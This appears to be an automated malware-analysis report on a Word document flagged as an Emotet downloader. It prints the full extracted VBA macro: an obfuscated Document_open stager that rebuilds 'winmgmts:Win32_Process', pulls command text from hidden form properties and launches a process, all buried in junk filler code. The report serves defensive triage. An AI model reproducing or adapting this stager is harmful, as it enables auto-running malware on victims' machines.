Verdict: MALICIOUS
Risk score: 232
Heuristics: 8

- ClamAV: Doc.Downloader.Emotet-7464570-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7464570-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  Matched line in script:
    Cqyjfmfuhh = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Ktbzpwygnmjl.Sxdahqhm + "rocess"
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
  Matched line in script:
    Set Otljjauo = VBA.CreateObject(JJKBSKJ + Cqyjfmfuhh)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro.
  Matched line in script:
    Private Sub Document_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11189 bytes |

SHA-256: 7d6b095b4dc46cfa520e93bab140334ee73eed756d3f75e02ffea0d469ad14c6

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 303 of 522 identifiers look randomly generated (e.g. 'Bvpktcygkxbcs'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Ktbzpwygnmjl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sxdahqhm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Vqkkqkdeedz = Sitdhosekwdb
Wkurgvkyexd = 157
Cmtdxgvvzv = ("Omnis nisi enim rerum.")
Sklluhjxuh = (528)
Dim Ltrjtevazf As Integer
Dim Qsfuxuwpohnl As Double
Dim Jqtlouskreo As Integer
Dim Uzflnutv As Boolean
Dim Ozakeveg As String
Dim Fufgnqvzga As Integer
Dim Lscpivaqf As String
Oflojoony = (191)
Dim Wauzxwyu As String
Ainhiomj = ("Temporibus eos eum.")
Fnmqbccmkrn = (650)
Dim Jvbujxdskdhow As Double
Bzcdsswio = Vumjxnxkdmgtc
Xukecedv = Ojkfmnnqlb
Afuqluuuf = "Eveniet dolor deserunt ad voluptatibus."
Qucxjcssybyi = 958
Mknkfqopifhnc = Nnbxkclmrfasu
Qayiterwf = 925
Noyqfxxwwpbl = ("Assumenda asperiores.")
Byweeyticogo = (419)
Dim Rwqwsqpwnaacv As Integer
Dim Qopwnsfura As Boolean
Dim Emjkqdzf As Boolean
Dim Ftmeflvebdvxm As Boolean
Dim Sgfmbyvlqlje As Boolean
Dim Zvsksjwjjn As Integer
Dim Nzdegajsxxtty As Boolean
Hwtvhftchc = (196)
Dim Qvixsrckwhle As String
Xmcbzmsaonpr = ("Mabel")
Uxwbtgtwoabb = (367)
Dim Nzkplmhgafd As Boolean
Qhvhaejq = Kkdbaycayr
Odagalnxqyt = Ptsaxmxn
Ehlhixef = "Occaecati iusto a."
Csrgudxdbulqz = 1
Fvvjkviqpi = Lwnhqlzdgll
Cexeaiqwjctp = 603
Tyzmzbuvrthgt = ("Deleniti explicabo voluptatem qui.")
Etkxrirlmoajt = (41)
Dim Trlpgegzlwxg As Integer
Dim Xtpdzfij As Boolean
Dim Ocnnxzrauxz As Double
Dim Egtxuzatbeho As Boolean
Dim Fuwlkzybeq As Boolean
Dim Mexmpehy As Integer
Dim Fhojrtmxgycom As Integer
Lpqwdbcetmwvp = (791)
Dim Hwahpoxa As String
Ogkuyysrn = ("Sapiente vero sed reprehenderit.")
Qchvcdvxvxw = (784)
Dim Qgneqkoo As Integer
Ovsjuoddbko = Tmmkbdmhrxhe
Nbdqahlsak = Jruuzpam
Ezmkxjwxlfbc = "Alias."
Ytnjialc = 504
Iobmoqajahxs
End Sub
Attribute VB_Name = "Vjgdknlt"
Attribute VB_Base = "0{5198C26E-EC35-48EC-B747-FBA047B9C264}{92B413BD-2514-4BCC-8A09-93C1A9E7EDC6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Nmgafsqbbgpfo"
Function Xnfdptigz()
Khwraequogtos = Swljvmnpphxkf
Cuvlyrbmv = 777
Ewydnidjjb = ("Non.")
Ekxrgkctlc = (727)
Dim Zsgpgqjq As Double
Dim Irrmtphwjf As Double
Dim Qabavctwac As Boolean
Dim Dvbncsrdqucf As Boolean
Dim Qnmpsbvpbgof As Double
Dim Xwkgcwiyn As Double
Dim Qoetwyvzblfk As Double
Myotvywxjg = (126)
Dim Wcdlrztvcn As Boolean
Fitgtwrmzwqy = ("Vel illo repellat ut.")
Suwtfxzmb = (833)
Dim Qtgrphzhtnnfq As String
Pilzmfrmgyz = Twtgajcck
Pqqarfpfos = Abgqzhzsqyr
Ugehckembkvoq = "Enim nam modi qui."
Jttqlfse = 423
Zseadboojgk = Ktbzpwygnmjl.Sxdahqhm
Cysuqjobxd = Slixnadfz
Pzhbpubzwqhu = 605
Evlixnknb = ("Placeat quis.")
Prcujrlsf = (725)
Dim Jhzhveirkqvr As Double
Dim Swbwibxfv As Boolean
Dim Zfmywchc As Double
Dim Ejqsffkqpu As String
Dim Oqujvxbydlze As String
Dim Vsonnpztonkec As Boolean
Dim Pgfdgqwdmg As String
Lisjmwgj = (11)
Dim Cgkuvchz As Boolean
Elofubpizocg = ("Quia consequatur debitis.")
Okwdxhvnumd = (406)
Dim Lvtwmpowzunp As String
Yjdavdvgk = Bjzqqbbvh
Fsproroqinm = Drmivxfknrlfp
Sltddkdkle = "Enim vel."
Rtxrpjcnz = 908
Onemonoegwjl = Zseadboojgk + Vjgdknlt.Spzrnfjqi + Vjgdknlt.Gwdnlcihm + Vjgdknlt.Hhzbdrrf
Eabwvkjadca = Vxrujavv
Sgrkxreo = 826
Hzznukcn = ("Ipsum voluptatem et.")
Pyluvfyqoe = (873)
Dim Czipdaljzonm As String
Dim Ydzzxhdtluvx As Integer
Dim Snzihpxaffgb As Double
Dim Jalyaahvrp As Integer
Dim Ojnougmsqlo As String
Dim Exyxusvft As Integer
Dim Iwwolxwkbt As Integer
Mrkapksxlht = (631)
Dim Jxwxliuz As Double
Xjxhtpedk = ("Woodrow")
Lgjsfvamzb = (151)
Dim Mczznplf As Integer
Mmqsczhgdi = Xqnfgnunddui
Tqrnzyvbu = Nsbesxui
Ilhjxlbgi = "Culpa ratione."
Hygqppiuw = 708
Zgccfgnm = Onemonoegwjl + Vjgdknlt.Xzyfmferj + Vjgdknlt.Umvcoqgnuzoip.Factoid
Byxegujbksebu = Gbwwiyczwh
Zdxavfat = 11
Lfzgwzmj = ("Omnis occaecati veniam et.")
Fnbmnunzzyaws = (414)
Dim Xmsjvtdcfq As Boolean
Dim Bbdmnjovlblmb As String
Dim Ulaomfvz As Double
Dim Zcfblvwwwlxw As Double
Dim Neyzwbfhct As Integer
Dim Fbfrfcqrngit As Integer
Dim Pqehcyzna As Integer
Wclorzmst = (506)
Dim Refvfuyhvezq As String
Dvqkssawkjz = ("Delbert")
Vgvbgpuy = (331)
Dim Hseptmcx As String
Zoewibxtutwvb = Azdsarqd
Rndhkilned = Zsfsbeff
Nmsmyfliikk = "Quaerat molestiae totam eligendi repudiandae consequuntur quas."
Nulklkiwovy = 591
Xnfdptigz = Drmsnotwnol + Zgccfgnm + Drmsnotwnol
Soxfwstek = Kldcbgpjxvpjt
Rgkkazlvhgn = 577
Fitzsycspqgm = ("Praesentium nulla nesciunt.")
Wkdedjfanu = (214)
Dim Wypwvnqx As Integer
Dim Bprvuybpdxy As Double
Dim Lebjgmfvzzo As Boolean
Dim Ctvswfhh As String
Dim Mipgzxqcfhj As Integer
Dim Tekkytbqcsqw As Boolean
Dim Kbthhcqpargf As Boolean
Xjvtyabolu = (737)
Dim Hwkqykqdgam As Integer
Cbedsesv = ("Ut asperiores aut.")
Twwxhtvpyysu = (432)
Dim Ktvoucwxv As Boolean
Ywltqptodqtbm = Klnbkhhztz
Bpxvbfci = Wiizfroqrj
Sljthnrwst = "Delectus."
Szfusvkana = 84
End Function
Function Iobmoqajahxs()
Gfrkozcvk = Ydrqvrkbiu
Dacuutvgxnoy = 848
Hqmxxjxgjel = ("Dianne")
Yroinzknklei = (201)
Dim Bmkptzhjupk As Double
Dim Xxqyjhzxpifay As Integer
Dim Xehputvu As String
Dim Rmmowzypcmq As Integer
Dim Vacsmdfovth As Double
Dim Hvcdbcsjrvn As Boolean
Dim Jhkwtkeqmosb As Boolean
Szwtecgrcny = (964)
Dim Bedfpjtuyey As String
Izvgkbsmzjvci = ("Ipsam distinctio.")
Sexxixclij = (86)
Dim Pwuvxtiuhvwc As Boolean
Acvhdgdgcugb = Fnnxhjcqenyia
Wivapwaqb = Piuzovbjptizu
Kxhjugrbfml = "Lola"
Cewlrlut = 259
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Cqyjfmfuhh = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Ktbzpwygnmjl.Sxdahqhm + "rocess"
Qikbcmxkhamzh = Aycsxzsrk
Vsujicdiu = 669
Qyfusqkpk = ("Tempora repellendus hic sunt atque consequatur non soluta eos quibusdam.")
Vryhzhxyrzrtr = (854)
Dim Xrjwyjdvidn As Boolean
Dim Bgvasyxdk As Double
Dim Wlvmfzfo As String
Dim Ssgornsv As Boolean
Dim Mdqxkeqb As Double
Dim Mnqganoqq As Integer
Dim Ynfinomaleiux As String
Uybaieuipfbz = (256)
Dim Ycegfnql As Boolean
Peaidettqhsqo = ("Autem facilis perferendis eligendi veniam ducimus placeat laboriosam.")
Udepcmpx = (779)
Dim Cdnscbjjek As Double
Mflmijgl = Ofkkmvmkagd
Bfbogjhj = Qrzeqegrleooi
Pnwtkwarekhg = "Sint repellat veniam debitis aut totam enim quos."
Caejgusn = 598
Set Otljjauo = VBA.CreateObject(JJKBSKJ + Cqyjfmfuhh)
Giznehiymp = Gbuifmkjvsq
Ywqhygpywrg = 792
Ywmknmekeknti = ("Sed ad nobis quia rerum rerum assumenda perspiciatis dolorem quaerat.")
Monsxzgkr = (919)
Dim Jbqjkoiinow As Boolean
Dim Exetmdoqw As Integer
Dim Idnbxsmvtz As Double
Dim Tvaykzvr As String
Dim Inaumynb As String
Dim Seagagkvbb As Boolean
Dim Bukyledqa As String
Fvzbcfohrbqk = (472)
Dim Tyepzqolcmfk As Integer
Jyhlaivlaf = ("Hic voluptatem.")
Ntzdkkudsgz = (726)
Dim Chttnvsq As String
Tufkgyhxygjcu = Bvpktcygkxbcs
Pzlvgjfaof = Aurzmhula
Ivunumewp = "Omnis amet nulla quidem."
Qjqzfowvbfi = 940
Eblefowmy = Cqyjfmfuhh + Vjgdknlt.Wawgjfyzzod.ControlTipText + Vjgdknlt.Hwsifhjmqjqi.ControlTipText
Jeleksqymjbua = Kaeybhxolgejt
Jdjhdnruecs = 407
Yavgjsknd = ("Nihil qui occaecati sit qui officiis explicabo cupiditate.")
Qlqayfjw = (69)
Dim Zxksmlsfawifp As Double
Dim Kyzbjagohq As Integer
Dim Qwyswyjydlowh As Integer
Dim Dstlwzqnh As Boolean
Dim Txtjccuobjcd As Integer
Dim Grhzjctrt As Integer
Dim Ofvxaiqjaflfu As String
Ctqyapgfph = (862)
Dim Ygbbeqnoxyq As Double
Lulaumnq = ("Et repellat magni.")
Abubghzg = (589)
Dim Tscydhpgupdc As String
Ouveuvvyagbaj = Gxsbjgtsm
Xgwixxlwmlm = Tvvrvxcxaz
Kafrvcihhypb = "Franklin"
Donbvtchin = 783
Bzucdvaekz = Eblefowmy + Ktbzpwygnmjl.Sxdahqhm
Sfbzfkqrwxg = Hezncvkl
Npukocti = 312
Jijzjzdhg = ("Fugiat.")
Udopxzcljqc = (423)
Dim Ojkzcpco As Double
Dim Uyuzdcrdf As Boolean
Dim Smgvrcqxrog As Boolean
Dim Lzodfqdzp As Boolean
Dim Qczzirmxgmvx As Double
Dim Kmmrmpoz As Boolean
Dim Donyozqcnmf As String
Qoabjsvp = (485)
Dim Zuerhcjfrp As Integer
Udoihvsksyvjv = ("Thomas")
Negqyaeoej = (148)
Dim Adgozsuuwn As Boolean
Awsrbyvvep = Kymvqpky
Sgmkwrahqa = Qbimmfomekhf
Fzegdbln = "Repellendus accusantium sunt et consequuntur blanditiis aperiam consectetur eum amet."
Frcevwzvwp = 122
Set Iobmoqajahxs = CreateObject(Bzucdvaekz)
Xdvvqbcyy = Dbgqjajtfmep
Jzncbjjpk = 801
Kdukwdlgsspqw = ("Rerum distinctio.")
Fqiusozphc = (621)
Dim Xsioqpryxpii As Integer
Dim Jdntiqrodtgq As String
Dim Lnmiihnnje As Boolean
Dim Enpphalz As Double
Dim Bntxejopharh As Boolean
Dim Caabfvtjvh As String
Dim Znlgeyfq As String
Okcezuwxixzfn = (745)
Dim Jtjbrsllajaea As Integer
Bwxdlqyawznx = ("Jesus")
Etadhvewpuh = (285)
Dim Cuypvcpwdhjwj As Integer
Nbeumxwqaata = Hdwirwfxk
Jralqhyklinq = Bgeypbbbrve
Ronprmzdfve = "Vel expedita et tenetur."
Vqcwtnjrqqbz = 18
Iobmoqajahxs.XSize = False
Zoghckwsawa = Emwdatqnnwh
Yezxcwicq = 30
Augucqjiqccfp = ("Sunt sapiente architecto est sed maiores beatae ut deserunt nihil.")
Sialszowlssdu = (73)
Dim Mniycgmvk As String
Dim Zccwzkvfdzb As Integer
Dim Ymxucknoeh As Double
Dim Xrzrfnpoeam As String
Dim Siipaikiwaq As Double
Dim Sajyvulhcswo As String
Dim Lqhyadfjbf As Double
Zggariin = (147)
Dim Eferiiqplbc As String
Robqemjzezrvf = ("Non placeat magnam distinctio.")
Bnfksxlc = (814)
Dim Vwsmtybch As Integer
Pseakpzgnw = Pnyvsebgm
Jqqnlapsy = Muajhhlvfms
Yucjygia = "Libero quas."
Vkucogydew = 341
Iobmoqajahxs.YSize = False
Ybzqyxrqsxr = Bczwuxslsg
Xypudxwte = 368
Jutcypyi = ("Dicta id sit.")
Otyqjxcoefuvj = (859)
Dim Cwpavpgmbqcau As Double
Dim Uyhkjeqduaufa As Integer
Dim Nksdvtjib As String
Dim Hxzhwhthlv As Integer
Dim Rumsvzajfcucr As Double
Dim Zdkqgdaxtdm As Integer
Dim Lsykambjjan As Boolean
Xcfcxpoq = (807)
Dim Afhurwsoi As Double
Yndjceggqcw = ("Voluptatem molestias ut inventore.")
Gxsqgxpwq = (378)
Dim Fsrjnqlfmnyob As Boolean
Khjebdxcoteb = Fqhaeeknwt
Rvriiqymmim = Vipdqjodtg
Oxokxkpekmb = "Deserunt ipsum ut dignissimos."
Kndvzxevo = 242
Do While Otljjauo.Create(UJNDB & Xnfdptigz, Dooytvjv, Iobmoqajahxs, Muaywgtus)
Loop
Nmbybdqtq = Psxnahkgp
Gwedlngst = 462
Oftqozpbvoi = ("Animi nisi ut nemo.")
Qsnsfzcvkggft = (401)
Dim Cmyskzdrujtk As Double
Dim Ctykimsaomt As Boolean
Dim Dzmlvbwzippc As String
Dim Asimokhhmi As Double
Dim Lzcylzpfas As Integer
Dim Yjvoudihlzshg As String
Dim Knwmdqkqw As Integer
Epnrmikjof = (163)
Dim Njznzlhurkve As String
Feintysk = ("Sharon")
Uumjxxmyvujd = (126)
Dim Lepbstui As Boolean
Dfbamqadjh = Yxxuywjxu
Ebojqrfx = Dgrvmmeugtwk
Reyvyzbob = "Sunt sint ut molestias provident aliquid voluptatibus quia sit."
Yxgklejhkurgy = 566
End Function